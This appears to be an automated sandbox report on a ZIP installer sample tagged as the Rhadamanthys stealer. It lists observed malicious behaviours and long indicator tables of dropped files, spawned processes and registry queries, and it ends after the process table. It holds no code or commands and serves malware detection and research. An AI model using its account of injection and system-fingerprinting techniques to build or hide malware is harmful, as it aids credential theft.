Malware Analysis Report

2024-11-30 02:15

Sample ID 240326-pdgk4acg7y
Target x32_x64_installer.zip
SHA256 718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6
Tags
rhadamanthys stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

718dc58c02f2c98eda1eae96c5bde5e0d71bf418c483fea0eea84645b4cafae6

Threat Level: Known bad

The file x32_x64_installer.zip was found to be: Known bad.

Malicious Activity Summary

rhadamanthys stealer

Suspicious use of NtCreateUserProcessOtherParentProcess

Rhadamanthys

Blocklisted process makes network request

Executes dropped EXE

Loads dropped DLL

Enumerates connected drives

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Program crash

Suspicious use of FindShellTrayWindow

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Suspicious use of UnmapMainImage

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Suspicious use of SendNotifyMessage

Suspicious use of WriteProcessMemory

Modifies registry class

Checks processor information in registry

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-26 12:12

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-26 12:12

Reported

2024-03-26 12:22

Platform

win10v2004-20240226-en

Max time kernel

570s

Max time network

566s

Command Line

sihost.exe

Signatures

Rhadamanthys

stealer rhadamanthys

Suspicious use of NtCreateUserProcessOtherParentProcess

Description Indicator Process Target
PID 3400 created 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe
PID 4912 created 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe
PID 3456 created 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe
PID 2496 created 2416 N/A C:\Windows\SysWOW64\explorer.exe C:\Windows\system32\sihost.exe

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Windows\syswow64\MsiExec.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\dirmngr.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpg.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\gpgconf.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\Duwus public\AppUbw\scdaemon.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\P: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\A: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\K: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\U: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\L: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\System32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\page_embed_script.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\gl\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\kk\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lt\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\128.png C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ta\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bg\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\eventpage_bin_prod.js C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\de\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\nl\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hi\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\el\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sv\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_metadata\verified_contents.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\msedge_url_fetcher_1472_264658919\GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_75_4_0.crx C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\am\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\bn\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\no\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\es_419\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\id\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\uk\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ro\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fa\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\mr\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ur\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\dasherSettingSchema.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\et\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\th\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fr_CA\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ja\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\lo\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zu\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ko\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_CA\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pa\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_BR\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_US\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sw\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ms\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hy\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\hu\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_TW\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ka\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pl\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_HK\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cs\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\cy\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\eu\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\is\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\manifest.fingerprint C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ca\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\sl\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\pt_PT\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\af\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\en_GB\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ml\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ar\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\ne\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\tr\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\km\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\fil\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
File created C:\Program Files\chrome_Unpacker_BeginUnzipping1472_566254250\_locales\zh_CN\messages.json C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Installer\e59d319.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e59d315.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE883.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIE99D.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSI2E4B.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\e59d315.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEA59.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIEDF5.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\ C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\inprogressinstallinfo.ipi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSID622.tmp C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Installer\MSIECDB.tmp C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\SourceHash{654024B2-0767-4BCD-BC79-7CF46AF9D5A1} C:\Windows\system32\msiexec.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{6E140374-1889-48B5-BB86-B4871CA0CE5E} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{756DD9AC-0A57-4FD0-9B91-097FCFC96327} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-3808065738-1666277613-1125846146-1000\{38A4DE08-9A7B-4EFD-8A8C-0382089BF6F6} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\explorer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\SysWOW64\dialer.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
